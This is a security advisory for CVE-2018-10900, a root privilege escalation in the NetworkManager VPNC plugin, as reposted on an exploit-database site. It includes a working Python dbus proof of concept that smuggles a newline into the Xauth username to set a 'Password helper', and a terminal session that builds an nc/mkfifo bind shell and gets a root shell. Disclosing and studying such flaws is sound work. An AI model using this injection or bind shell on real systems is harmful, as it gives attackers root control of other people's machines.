0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Network Manager VPNC 1.2.4 Privilege Escalation Vulnerability
Author
Risk
![](/img/risk/critlow_3.gif)
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
Network Manager VPNC - Privilege Escalation (CVE-2018-10900) Release URL: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc CVE: CVE-2018-10900 Author: Denis Andzakovic Source: https://gitlab.gnome.org/GNOME/NetworkManager-vpnc Affected Software: Network Manager VPNC a 1.2.4 --[ Description The Network Manager VPNC plugin is vulnerable to a privilege escalation attack. A new line character can be used to inject a Password helper parameter into the configuration data passed to VPNC, allowing an attacker to execute arbitrary commands as root. --[ Privilege Escalation When initiating a VPNC connection, Network Manager spawns a new vpnc process and passes the configuration via STDIN. By injecting a \n character into a configuration parameter, an attacker can coerce Network Manager to set the Password helper option to an attacker controlled executable file. The following python script generates a VPNC connection which will execute the /tmp/test file when connected. The new line character is injected into the Xauth username parameter. import dbus con = { 'vpn':{ 'service-type':'org.freedesktop.NetworkManager.vpnc', 'data':{ 'IKE DH Group':'dh2', 'IPSec ID':'testgroup', 'IPSec gateway':'gateway', 'IPSec secret-flags':'4', 'Local Port':'0', 'NAT Traversal Mode': 'natt', 'Perfect Forward Secrecy': 'server', 'Vendor': 'cisco', 'Xauth password-flags': '4', 'Xauth username': "username\nPassword helper /tmp/test", 'ipsec-secret-type': 'unused', 'xauth-password-type': 'unused' } }, 'connection':{ 'type':'vpn', 'id':'vpnc_test', }, 'ipv4':{'method':'auto'}, 'ipv6':{'method':'auto'} } bus = dbus.SystemBus() proxy = bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager/Settings") settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings") settings.AddConnection(con) The above results in the following configuration being passed to the vpnc process when the connection is initialized: Debug 0 Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950 --bus-name org.freedesktop.NetworkManager.vpnc.Connection_4 Cisco UDP Encapsulation Port 0 Local Port 0 IKE DH Group dh2 Perfect Forward Secrecy server Xauth username username Password helper /tmp/test IPSec gateway gateway IPSec ID testgroup Vendor cisco NAT Traversal Mode natt The following figure details the complete privilege escalation attack. doi@ubuntu:~$ cat << EOF > /tmp/test > #!/bin/bash > mkfifo pipe > nc -k -l -p 8080 < pipe | /bin/bash > pipe > EOF doi@ubuntu:~$ python vpnc_privesc.py doi@ubuntu:~$ nmcli connection NAME UUID TYPE DEVICE Wired connection 1 a8b178fd-8cbc-3e15-aa9e-d52982215d98 ethernet ens3 vpnc_test 233101cb-f786-44ed-9e4f-662f1a519429 vpn ens3 doi@ubuntu:~$ nmcli connection up vpnc_test ^Z [1]+ Stopped nmcli connection up vpnc_test doi@ubuntu:~$ nc -vv 127.0.0.1 8080 Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded! id uid=0(root) gid=0(root) groups=0(root) --[ Timeline 11/07/2018 - Advisory sent to security@gnome.org 13/07/2018 - Acknowledgement from Gnome security 20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day 21/07/2018 - Network Manager VPNC 1.2.6 released 21/07/2018 - Advisory released --[ About Pulse Security Pulse Security is a specialist offensive security consultancy dedicated to providing best in breed security testing and review services. W: https://pulsesecurity.co.nz E: info at pulsesecurity.co.nz # 0day.today [2024-07-01] #